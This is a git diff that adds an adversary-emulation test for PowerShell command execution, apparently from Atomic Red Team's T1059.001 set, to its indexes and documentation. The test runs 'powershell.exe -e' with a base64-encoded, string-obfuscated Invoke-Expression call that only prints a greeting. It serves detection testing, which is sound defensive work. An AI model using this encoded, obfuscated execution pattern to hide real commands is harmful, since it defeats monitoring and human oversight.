diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 3fc9f744..96a6d79c 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -1039,6 +1039,7 @@ - Atomic Test #16: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows] - Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows] - Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows] + - Atomic Test #19: PowerShell Command Execution [windows] - T1059.006 Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md) - Atomic Test #1: Scheduled Task Startup Script [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 9f6d2752..2d41ec4d 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -60105,6 +60105,25 @@ execution: -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop' name: powershell + - name: PowerShell Command Execution + auto_generated_guid: a538de64-1c74-46ed-aa60-b995ed302598 + description: 'Use of obfuscated PowerShell to execute an arbitrary command; + outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection + Report by Red Canary. + +' + supported_platforms: + - windows + input_arguments: + obfuscated_code: + description: 'Defaults to: Invoke-Expression with a "Write-Host" line.' + type: string + default: JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA== + executor: + command: 'powershell.exe -e #{obfuscated_code} + +' + name: command_prompt T1059.006: technique: external_references: diff --git a/atomics/T1059.001/T1059.001.md b/atomics/T1059.001/T1059.001.md index d86d109d..4f969e4f 100644 --- a/atomics/T1059.001/T1059.001.md +++ b/atomics/T1059.001/T1059.001.md @@ -46,6 +46,8 @@ PowerShell commands/scripts can also be executed without directly invoking the < - [Atomic Test #18 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments](#atomic-test-18---athpowershellcommandlineparameter--encodedcommand-parameter-variations-with-encoded-arguments) +- [Atomic Test #19 - PowerShell Command Execution](#atomic-test-19---powershell-command-execution) +
@@ -768,4 +770,37 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force +
+
+ +## Atomic Test #19 - PowerShell Command Execution +Use of obfuscated PowerShell to execute an arbitrary command; outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** a538de64-1c74-46ed-aa60-b995ed302598 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| obfuscated_code | Defaults to: Invoke-Expression with a "Write-Host" line. | string | JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +powershell.exe -e #{obfuscated_code} +``` + + + + + +